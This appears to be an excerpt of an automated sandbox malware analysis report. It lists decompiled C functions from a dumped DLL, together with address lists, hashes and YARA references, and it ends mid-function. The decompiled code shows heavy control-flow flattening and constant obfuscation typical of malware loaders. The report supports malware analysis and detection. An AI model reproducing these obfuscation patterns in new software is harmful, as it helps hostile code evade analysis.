0x10012f5f
0x10012f61
0x10012f64
0x10012f66
0x10012f66
0x10012f66
0x00000000

Strings

Sx, xrefs: 10012DBB
bd, xrefs: 10012DD8
Jz, xrefs: 10012C71
,, xrefs: 10012D13
Z8, xrefs: 10012CFB

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Jz$Sx$Z8$bd$,
API String ID: 0-4260221676
Opcode ID: 48c31bd747e4ba6fb85fcee0e74c5e38a085c8e52974c68a6e4f1aec20570e5a
Instruction ID: 957f593b6ac554066e47ecbdecadbb8f0d4b8d58c568b5ebfeb3ceed07b02265
Opcode Fuzzy Hash: 48c31bd747e4ba6fb85fcee0e74c5e38a085c8e52974c68a6e4f1aec20570e5a
Instruction Fuzzy Hash: CA911F715083419FD358CF65D88981FFBF1FB85748F108A2DF1969A2A0D3B59A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10007B39 Relevance: 6.4, Strings: 5, Instructions: 185
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10007B39(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12) {
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t184;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				void* _t195;
				signed int* _t216;
				signed int* _t219;

				_t216 = _a8;
				_push(_a12);
				_t215 = _a4;
				_push(_t216);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t159);
				_v84 = 0xb1cc;
				_t219 =  &(( &_v128)[5]);
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x000b391c;
				_t195 = 0x56cb2a8;
				_v128 = 0xbdb6;
				_t189 = 0x75;
				_v128 = _v128 * 0x3c;
				_v128 = _v128 + 0xffff325f;
				_v128 = _v128 | 0xdb930895;
				_v128 = _v128 ^ 0xdbbbdb43;
				_v120 = 0x3f39;
				_v120 = _v120 / _t189;
				_v120 = _v120 | 0x67adff47;
				_t190 = 0x54;
				_v120 = _v120 / _t190;
				_v120 = _v120 ^ 0x013b8a2c;
				_v124 = 0x6147;
				_v124 = _v124 + 0xb97c;
				_v124 = _v124 + 0xd90c;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x00007a9c;
				_v112 = 0x89a1;
				_t191 = 0x58;
				_v112 = _v112 / _t191;
				_v112 = _v112 + 0xf8e9;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x0000539c;
				_v76 = 0x8cc3;
				_v76 = _v76 + 0xac03;
				_v76 = _v76 ^ 0x00011eb4;
				_v116 = 0xfa45;
				_v116 = _v116 + 0xffff9361;
				_v116 = _v116 | 0xe6f660f2;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x737b7b0a;
				_v104 = 0xcf7e;
				_v104 = _v104 << 0xe;
				_v104 = _v104 * 0x27;
				_v104 = _v104 ^ 0xe70cfdcc;
				_v72 = 0x35c6;
				_v72 = _v72 ^ 0x4611c0ec;
				_v72 = _v72 ^ 0x4611c92f;
				_v100 = 0x6fa4;
				_v100 = _v100 * 0x52;
				_v100 = _v100 | 0xcb75e14d;
				_v100 = _v100 ^ 0xcb77ed32;
				_v68 = 0x95e2;
				_v68 = _v68 + 0x2a27;
				_v68 = _v68 ^ 0x0000e822;
				_v88 = 0xac43;
				_v88 = _v88 * 0x58;
				_v88 = _v88 >> 8;
				_v88 = _v88 ^ 0x00007f70;
				_v92 = 0x7b7b;
				_v92 = _v92 + 0xffffa4a1;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x0403a3f8;
				_v96 = 0x9efc;
				_v96 = _v96 ^ 0x9f755fcb;
				_t192 = 0x7a;
				_v96 = _v96 / _t192;
				_v96 = _v96 ^ 0x014e9ac3;
				_v80 = 0x52a1;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00002d50;
				_v108 = 0x1e90;
				_v108 = _v108 + 0xffffb99d;
				_v108 = _v108 + 0xd5ca;
				_v108 = _v108 ^ 0x0000a5f7;
				do {
					while(_t195 != 0x56cb2a8) {
						if(_t195 == 0x686a9af) {
							E1000BAD2(_v68, _v88, __eflags, _t215 + 4,  &_v64, _v92);
						} else {
							if(_t195 == 0xd2701c0) {
								E1000F834( *_t215, _v72,  &_v64, _v100);
								_t219 =  &(_t219[2]);
								_t195 = 0x686a9af;
								continue;
							} else {
								if(_t195 == 0x104361af) {
									_t214 =  &_v64;
									E1000FEE3(_t216,  &_v64, _v112, _v76, _v116, _v104);
									_t219 =  &(_t219[4]);
									_t195 = 0xd2701c0;
									continue;
								} else {
									if(_t195 == 0x1c12ad24) {
										_t214 = _t216[1];
										_push(_t195);
										_t184 = E100054FB(_t216[1]);
										 *_t216 = _t184;
										__eflags = _t184;
										if(__eflags != 0) {
											_t195 = 0x104361af;
											continue;
										}
									} else {
										_t227 = _t195 - 0x25d9ecfc;
										if(_t195 != 0x25d9ecfc) {
											goto L13;
										} else {
											_t216[1] = E10003134(_t215);
											_t216[1] = _t216[1] + E1000DF8A(_t215, _t214, _t227, _v108, _v80);
											_t195 = 0x1c12ad24;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t216;
						_t158 =  *_t216 != 0;
						__eflags = _t158;
						return 0 | _t158;
					}
					_t195 = 0x25d9ecfc;
					 *_t216 =  *_t216 & 0x00000000;
					__eflags =  *_t216;
					_t216[1] = _v96;
					L13:
					__eflags = _t195 - 0xb99db01;
				} while (__eflags != 0);
				goto L16;
			}

0x10007b42
0x10007b4a
0x10007b51
0x10007b58
0x10007b59
0x10007b5a
0x10007b5b
0x10007b5c
0x10007b61
0x10007b69
0x10007b6c
0x10007b73
0x10007b7b
0x10007b80
0x10007b8f
0x10007b92
0x10007b96
0x10007b9e
0x10007ba6
0x10007bae
0x10007bbe
0x10007bc2
0x10007bce
0x10007bd3
0x10007bd9
0x10007be1
0x10007be9
0x10007bf1
0x10007bf9
0x10007bfe
0x10007c06
0x10007c12
0x10007c15
0x10007c19
0x10007c21
0x10007c26
0x10007c2e
0x10007c36
0x10007c3e
0x10007c46
0x10007c4e
0x10007c56
0x10007c5e
0x10007c62
0x10007c6a
0x10007c72
0x10007c7c
0x10007c80
0x10007c88
0x10007c90
0x10007c98
0x10007ca0
0x10007cad
0x10007cb1
0x10007cb9
0x10007cc1
0x10007cc9
0x10007cd1
0x10007cd9
0x10007ce6
0x10007cea
0x10007cef
0x10007cf9
0x10007d06
0x10007d0e
0x10007d13
0x10007d1b
0x10007d23
0x10007d31
0x10007d39
0x10007d3d
0x10007d45
0x10007d4d
0x10007d51
0x10007d59
0x10007d61
0x10007d69
0x10007d71
0x10007d79
0x10007d79
0x10007d8b
0x10007e77
0x10007d91
0x10007d97
0x10007e36
0x10007e3b
0x10007e3e
0x00000000
0x10007d9d
0x10007d9f
0x10007e03
0x10007e15
0x10007e1a
0x10007e1d
0x00000000
0x10007da1
0x10007da7
0x10007de4
0x10007de7
0x10007de8
0x10007ded
0x10007df0
0x10007df2
0x10007df8
0x00000000
0x10007df8
0x10007da9
0x10007da9
0x10007dab
0x00000000
0x10007db1
0x10007db8
0x10007dd0
0x10007dd5
0x00000000
0x10007dd5
0x10007dab
0x10007da7
0x10007d9f
0x10007d97
0x10007e7f
0x10007e81
0x10007e86
0x10007e86
0x10007e90
0x10007e90
0x10007e4c
0x10007e4e
0x10007e4e
0x10007e51
0x10007e54
0x10007e54
0x10007e54
0x00000000

Strings

{{, xrefs: 10007CF9
{{s, xrefs: 10007C62
", xrefs: 10007CD1
Ga, xrefs: 10007BE1
P-, xrefs: 10007D51

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: {{s$"$Ga$P-${{
API String ID: 0-2936447301
Opcode ID: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
Instruction ID: f626bf4966703dadd1c2b1958fd8731474ff70a108474080c1a1254b79545203
Opcode Fuzzy Hash: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
Instruction Fuzzy Hash: 3D8102719083429FE358CF21C48981FBBF1FB88398F50891DF59A962A0D779DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10002DDF Relevance: 6.4, Strings: 5, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E10002DDF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				void* _t153;
				signed int _t171;
				signed int _t174;
				void* _t178;
				signed int _t186;
				void* _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t209;

				_push(_a8);
				_t201 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t153);
				_v560 = _v560 & 0x00000000;
				_t209 =  &(( &_v628)[4]);
				_v568 = 0x24f3a1;
				_v564 = 0x3c9bd4;
				_t178 = 0x32110b52;
				_v576 = 0x263a;
				_v576 = _v576 << 1;
				_v576 = _v576 ^ 0x00007813;
				_v620 = 0x4ee;
				_t202 = 0x33;
				_v620 = _v620 / _t202;
				_v620 = _v620 + 0xffff352c;
				_v620 = _v620 ^ 0xc3d5301d;
				_v620 = _v620 ^ 0x3c2a31a1;
				_v600 = 0x4188;
				_v600 = _v600 + 0xffffb186;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0xfffcab3f;
				_v628 = 0xc09d;
				_v628 = _v628 + 0xffff1566;
				_v628 = _v628 | 0xe9e98308;
				_v628 = _v628 << 0xf;
				_v628 = _v628 ^ 0xeb85c3aa;
				_v608 = 0x281d;
				_t203 = 0x58;
				_v608 = _v608 / _t203;
				_v608 = _v608 | 0xeb359492;
				_v608 = _v608 ^ 0xeb35e871;
				_v612 = 0x4fd;
				_t204 = 0x71;
				_v612 = _v612 * 0x31;
				_v612 = _v612 + 0xffff74e9;
				_v612 = _v612 ^ 0x3f703ef4;
				_v612 = _v612 ^ 0x3f704256;
				_v572 = 0x8bdc;
				_v572 = _v572 >> 6;
				_v572 = _v572 ^ 0x00004ce8;
				_v616 = 0xbbb9;
				_v616 = _v616 * 0x57;
				_v616 = _v616 + 0x295;
				_v616 = _v616 ^ 0x9d8bead1;
				_v616 = _v616 ^ 0x9db42d64;
				_v592 = 0xdb3f;
				_v592 = _v592 | 0x5fa632d8;
				_v592 = _v592 ^ 0xb4c5443f;
				_v592 = _v592 ^ 0xeb638af6;
				_v624 = 0xda21;
				_v624 = _v624 / _t204;
				_t205 = 0x79;
				_v624 = _v624 / _t205;
				_v624 = _v624 | 0xd586b067;
				_v624 = _v624 ^ 0xd586ca9a;
				_v596 = 0x23f3;
				_v596 = _v596 << 0x10;
				_t206 = _v576;
				_v596 = _v596 * 0x21;
				_v596 = _v596 ^ 0xa2536537;
				_v604 = 0xb869;
				_v604 = _v604 + 0x1500;
				_v604 = _v604 ^ 0xdf411415;
				_v604 = _v604 ^ 0xdf41df50;
				_v580 = 0x91ab;
				_v580 = _v580 | 0x75cd6eed;
				_v580 = _v580 ^ 0x75cdc157;
				_v584 = 0x41c3;
				_v584 = _v584 | 0x7a0b54b1;
				_v584 = _v584 + 0x22a4;
				_v584 = _v584 ^ 0x7a0b1750;
				_v588 = 0xc9d8;
				_v588 = _v588 << 6;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x000064ee;
				do {
					while(_t178 != 0x5ded331) {
						if(_t178 != 0xe6392eb) {
							if(_t178 == 0x26ceaef1) {
								return E1000F1ED(_v596, _v604, _v580, _v584, _t206);
							}
							if(_t178 == 0x294df979) {
								_t174 = E1001293E(_v572, _v616,  &_v556, _v592, _v624, _t206);
								_t209 =  &(_t209[4]);
								asm("sbb ecx, ecx");
								_t186 =  ~_t174 & 0x034cb45d;
								goto L9;
							} else {
								if(_t178 == 0x2a1b634e) {
									_t174 = _a8( &_v556, _t201);
									asm("sbb ecx, ecx");
									_t186 =  ~_t174 & 0x027f4a88;
									L9:
									_t178 = _t186 + 0x26ceaef1;
									continue;
								} else {
									if(_t178 != 0x32110b52) {
										goto L16;
									} else {
										_t178 = 0xe6392eb;
										continue;
									}
								}
							}
						}
						_t171 = E10012B68(_t178, _v588);
						_t206 = _t171;
						_t209 = _t209 - 0xc + 0x10;
						if(_t171 != 0xffffffff) {
							_t178 = 0x5ded331;
							continue;
						}
						return _t171;
						L20:
					}
					_v556 = 0x22c;
					if(E10011623( &_v556, _t206, _v608, _v612) == 0) {
						_t178 = 0x26ceaef1;
						goto L16;
					} else {
						_t178 = 0x2a1b634e;
						continue;
					}
					goto L20;
					L16:
				} while (_t178 != 0x281e4e2f);
				return _t174;
			}

0x10002de9
0x10002df0
0x10002df2
0x10002df9
0x10002dfa
0x10002dfb
0x10002e00
0x10002e05
0x10002e08
0x10002e12
0x10002e1a
0x10002e1f
0x10002e27
0x10002e2b
0x10002e33
0x10002e41
0x10002e46
0x10002e4c
0x10002e54
0x10002e5c
0x10002e64
0x10002e6c
0x10002e74
0x10002e79
0x10002e81
0x10002e89
0x10002e91
0x10002e99
0x10002e9e
0x10002ea6
0x10002eb2
0x10002eb7
0x10002ebd
0x10002ec5
0x10002ecd
0x10002eda
0x10002edd
0x10002ee1
0x10002ee9
0x10002ef1
0x10002ef9
0x10002f01
0x10002f06
0x10002f0e
0x10002f1b
0x10002f1f
0x10002f27
0x10002f2f
0x10002f37
0x10002f3f
0x10002f47
0x10002f4f
0x10002f57
0x10002f67
0x10002f6f
0x10002f72
0x10002f76
0x10002f7e
0x10002f86
0x10002f8e
0x10002fa2
0x10002fa6
0x10002faa
0x10002fb2
0x10002fba
0x10002fc2
0x10002fca
0x10002fd2
0x10002fda
0x10002fe2
0x10002fea
0x10002ff2
0x10002ffa
0x10003002
0x1000300a
0x10003012
0x10003017
0x1000301c
0x10003024
0x10003024
0x10003032
0x10003036
0x00000000
0x10003126
0x10003042
0x10003092
0x10003097
0x1000309e
0x100030a0
0x00000000
0x10003044
0x1000304a
0x10003065
0x10003070
0x10003072
0x10003078
0x10003078
0x00000000
0x1000304c
0x10003052
0x00000000
0x10003058
0x10003058
0x00000000
0x10003058
0x10003052
0x1000304a
0x10003042
0x100030bf
0x100030c4
0x100030c6
0x100030cc
0x100030ce
0x00000000
0x100030ce
0x10003133
0x00000000
0x10003133
0x100030db
0x100030f4
0x10003100
0x00000000
0x100030f6
0x100030f6
0x00000000
0x100030f6
0x00000000
0x10003102
0x10003102
0x00000000

Strings

q5, xrefs: 10002EC5
:&, xrefs: 10002E1F
L, xrefs: 10002F06
VBp?, xrefs: 10002EF1
d, xrefs: 1000301C

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: :&$VBp?$q5$L$d
API String ID: 0-1357951408
Opcode ID: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
Instruction ID: bccd7ab150ca56dc417a4cf9af3de827934b46ad41d7d5c94a8a77ad4474ad1d
Opcode Fuzzy Hash: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
Instruction Fuzzy Hash: 258165715093419BD398CF25D88985FBBE1FBC87A8F008A1DF596962A0D379CA48CF47

Uniqueness

Uniqueness Score: -1.00%

Function 10019DBF Relevance: 6.4, Strings: 5, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10019DBF() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t123;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int _t135;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int* _t158;

				_t158 =  &_v568;
				_v528 = 0x60d9f0;
				_t155 = 0;
				_t131 = 0x15228660;
				_v524 = 0;
				_v548 = 0xcd57;
				_t150 = 0x7d;
				_v548 = _v548 / _t150;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00004d7f;
				_v568 = 0x7da6;
				_v568 = _v568 ^ 0x9d4dffd0;
				_v568 = _v568 + 0x4fb1;
				_v568 = _v568 ^ 0x61a60d8b;
				_v568 = _v568 ^ 0xfceba89c;
				_v564 = 0xc0eb;
				_v564 = _v564 + 0xfffff60a;
				_v564 = _v564 + 0x7921;
				_v564 = _v564 | 0xce5d4b47;
				_v564 = _v564 ^ 0xce5d5527;
				_v560 = 0xb537;
				_v560 = _v560 ^ 0xfff7bf7c;
				_v560 = _v560 ^ 0xfff72356;
				_v552 = 0x7344;
				_t151 = 0x5d;
				_v552 = _v552 / _t151;
				_v552 = _v552 ^ 0x4bec447d;
				_v552 = _v552 ^ 0x4bec1377;
				_v532 = 0x249f;
				_v532 = _v532 | 0xc4145615;
				_v532 = _v532 ^ 0xc4142924;
				_v536 = 0x1806;
				_t152 = 0x57;
				_t157 = _v560;
				_t130 = _v560;
				_v536 = _v536 * 0x50;
				_v536 = _v536 ^ 0x00078d58;
				_v556 = 0x1833;
				_v556 = _v556 << 0xc;
				_v556 = _v556 + 0xffff5490;
				_v556 = _v556 ^ 0x0182d013;
				_v540 = 0x2b82;
				_v540 = _v540 / _t152;
				_v540 = _v540 ^ 0x00005334;
				_v544 = 0xc7f0;
				_t153 = 0x6c;
				_t154 = _v560;
				_v544 = _v544 / _t153;
				_v544 = _v544 ^ 0x00002c79;
				do {
					while(_t131 != 0x1f7477) {
						if(_t131 == 0x2a2b494) {
							_t123 = E1000A525(_v568, __eflags,  &_v520, _t154, _v564);
							_t158 =  &(_t158[3]);
							__eflags = _t123;
							if(__eflags == 0) {
								L18:
								return _t155;
							}
							_t131 = 0x1f7477;
							continue;
						}
						if(_t131 == 0x3351846) {
							_t126 = E10010CCD();
							_t154 = _t126;
							__eflags = _t126;
							if(__eflags == 0) {
								goto L18;
							}
							_t131 = 0x2a2b494;
							continue;
						}
						if(_t131 == 0x8686635) {
							_v568 = 0xbfc3;
							_t135 = 0x65;
							_v568 = _v568 / _t135;
							_v568 = _v568 | 0xe5cb59f9;
							_v568 = _v568 + 0xffffe272;
							_v568 = _v568 ^ 0xcfec3c93;
							__eflags = _t130 - _v568;
							if(_t130 == _v568) {
								_t155 = 1;
								__eflags = 1;
							}
							goto L18;
						}
						if(_t131 == 0x15228660) {
							_t131 = 0x3351846;
							continue;
						}
						if(_t131 != 0x2e9709f0) {
							goto L14;
						}
						_t129 = E1000165C(_t157, _v536, _v556, _v540, _v544);
						_t158 =  &(_t158[3]);
						_t130 = _t129;
						_t131 = 0x8686635;
					}
					_t157 = E1000BDCC( &_v520, _v560, _v552, _v532);
					_t131 = 0x2e9709f0;
					L14:
					__eflags = _t131 - 0x2a22e55c;
				} while (__eflags != 0);
				goto L18;
			}

0x10019dbf
0x10019dc5
0x10019dd5
0x10019dd7
0x10019ddc
0x10019de0
0x10019dec
0x10019df1
0x10019df7
0x10019dfc
0x10019e04
0x10019e0c
0x10019e14
0x10019e1c
0x10019e24
0x10019e2c
0x10019e34
0x10019e3c
0x10019e44
0x10019e4c
0x10019e54
0x10019e5c
0x10019e64
0x10019e6c
0x10019e78
0x10019e7d
0x10019e83
0x10019e8b
0x10019e93
0x10019e9b
0x10019ea3
0x10019eab
0x10019eb8
0x10019ebb
0x10019ebf
0x10019ec3
0x10019ec7
0x10019ecf
0x10019ed7
0x10019edc
0x10019ee4
0x10019eec
0x10019efc
0x10019f00
0x10019f08
0x10019f14
0x10019f17
0x10019f1b
0x10019f1f
0x10019f27
0x10019f27
0x10019f39
0x10019fb5
0x10019fba
0x10019fbd
0x10019fbf
0x1001a030
0x1001a03b
0x1001a03b
0x10019fc1
0x00000000
0x10019fc1
0x10019f41
0x10019f91
0x10019f96
0x10019f98
0x10019f9a
0x00000000
0x00000000
0x10019fa0
0x00000000
0x10019fa0
0x10019f49
0x10019ff7
0x1001a007
0x1001a00a
0x1001a00e
0x1001a016
0x1001a01e
0x1001a026
0x1001a02a
0x1001a02e
0x1001a02e
0x1001a02e
0x00000000
0x1001a02a
0x10019f55
0x10019f86
0x00000000
0x10019f86
0x10019f5d
0x00000000
0x00000000
0x10019f75
0x10019f7a
0x10019f7d
0x10019f7f
0x10019f7f
0x10019fe2
0x10019fe4
0x10019fe9
0x10019fe9
0x10019fe9
0x00000000

Strings

4S, xrefs: 10019F00
y,, xrefs: 10019F1F
\"*, xrefs: 10019FE9
}DK, xrefs: 10019E83
!y, xrefs: 10019E3C

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !y$4S$\"*$y,$}DK
API String ID: 0-1385372798
Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction ID: c8b7a0baf74bcfa94925aff040367ddfa216b556d67bd9ad2cba0553152ecf9a
Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
Instruction Fuzzy Hash: 915199715083419BD354CF20C58991FBBE1FBC8798F100A2EF5999A2A0D774DA8ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 10019B4A Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10019B4A(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t139;
				intOrPtr _t141;
				intOrPtr _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t173;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t176;

				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x24c8e6;
				_v12 = 0x512e7e;
				_v64 = 0xe6d4;
				_v64 = _v64 + 0xffffc62e;
				_v64 = _v64 ^ 0x62da4f4f;
				_v64 = _v64 + 0x4b4;
				_v64 = _v64 ^ 0x62daac72;
				_v36 = 0x1dac;
				_t151 = 0xc;
				_v36 = _v36 / _t151;
				_v36 = _v36 ^ 0x000026fb;
				_v60 = 0xf2ce;
				_v60 = _v60 + 0x7932;
				_t152 = 0x4d;
				_v60 = _v60 / _t152;
				_t153 = 0x3b;
				_v60 = _v60 * 0x21;
				_v60 = _v60 ^ 0x00008d5c;
				_v32 = 0x9fef;
				_v32 = _v32 ^ 0xbf11c352;
				_v32 = _v32 ^ 0xbf1108c7;
				_v40 = 0x93bf;
				_v40 = _v40 + 0xffffb4ac;
				_v40 = _v40 / _t153;
				_v40 = _v40 ^ 0x00007264;
				_v44 = 0x3ea3;
				_v44 = _v44 | 0x1bb7f55d;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x376fc359;
				_v24 = 0xe782;
				_v24 = _v24 + 0xffff9e28;
				_v24 = _v24 ^ 0x0000d291;
				_v28 = 0xff08;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x000057fc;
				_v48 = 0x3b3e;
				_v48 = _v48 << 9;
				_t154 = 0x19;
				_v48 = _v48 * 0x7b;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00e3c1df;
				_v20 = 0x1063;
				_v20 = _v20 + 0xffffa595;
				_v20 = _v20 ^ 0xffffc157;
				_v52 = 0xa2f2;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xffff5a4e;
				_v52 = _v52 + 0xb28b;
				_v52 = _v52 ^ 0x00000530;
				_v56 = 0x99a4;
				_v56 = _v56 / _t154;
				_v56 = _v56 + 0xfffff33a;
				_v56 = _v56 + 0xffffe1ed;
				_v56 = _v56 ^ 0xfffff62c;
				_t139 = E10011999();
				_t173 = _a4;
				_t175 = _t139;
				_v64 = 0x5a09;
				_v64 = _v64 + 0x27ad;
				_v64 = _v64 + 0xa7ad;
				_v64 = _v64 ^ 0x00012963;
				_t177 = _t173 + 0x24;
				_t150 = E1000165C(_t173 + 0x24, _v60, _v32, _v40, _v44);
				_t141 =  *((intOrPtr*)(_t173 + 8));
				if(_t141 != _v64 && _t141 != _t175) {
					_t156 =  *((intOrPtr*)(_t173 + 0x18));
					if(_t156 != _v64 && _t156 != _t175) {
						_t174 = _a8;
						_t157 =  *_t174;
						if(E1000E9C1(_t157, _t150) == 0) {
							_push(_t157);
							_t176 = E100054FB(0x224);
							if(_t176 != 0) {
								_t121 = _t176 + 0x1c; // 0x1c
								E100103F1(_v48, _v20, _t177, _t121, _v52, _v56);
								 *((intOrPtr*)(_t176 + 0x10)) = _t150;
								 *((intOrPtr*)(_t176 + 8)) =  *_t174;
								 *_t174 = _t176;
							}
						}
					}
				}
				return 1;
			}

0x10019b4d
0x10019b54
0x10019b59
0x10019b61
0x10019b69
0x10019b70
0x10019b77
0x10019b7e
0x10019b85
0x10019b8c
0x10019b9e
0x10019ba3
0x10019ba9
0x10019bb1
0x10019bb9
0x10019bc5
0x10019bca
0x10019bd5
0x10019bd8
0x10019bdc
0x10019be4
0x10019bec
0x10019bf4
0x10019bfc
0x10019c04
0x10019c14
0x10019c18
0x10019c20
0x10019c28
0x10019c30
0x10019c34
0x10019c3c
0x10019c44
0x10019c4c
0x10019c54
0x10019c5c
0x10019c61
0x10019c69
0x10019c71
0x10019c7b
0x10019c7c
0x10019c80
0x10019c85
0x10019c8d
0x10019c95
0x10019c9d
0x10019ca5
0x10019cad
0x10019cb2
0x10019cba
0x10019cc2
0x10019cca
0x10019cd8
0x10019cdc
0x10019ce4
0x10019cec
0x10019cfc
0x10019d01
0x10019d05
0x10019d07
0x10019d0f
0x10019d17
0x10019d1f
0x10019d27
0x10019d41
0x10019d46
0x10019d4d
0x10019d53
0x10019d5a
0x10019d60
0x10019d66
0x10019d6f
0x10019d7e
0x10019d84
0x10019d89
0x10019d8f
0x10019da0
0x10019da5
0x10019dad
0x10019db0
0x10019db0
0x10019d89
0x10019d6f
0x10019d5a
0x10019dbc

Strings

dr, xrefs: 10019C18
>;, xrefs: 10019C69
Z, xrefs: 10019D07
~.Q, xrefs: 10019B61
2y, xrefs: 10019BB9

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Z$2y$>;$dr$~.Q
API String ID: 0-1863639504
Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction ID: ef38d3adfb2250859c77493159b8b081024bc8eb5ca41249339b719c0027cfbc
Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
Instruction Fuzzy Hash: 296113715083429FD384CF25D48955BBBE1FBD4398F105A1DF0D59A2A0D3B8DA99CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000BB96 Relevance: 6.4, Strings: 5, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000BB96(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
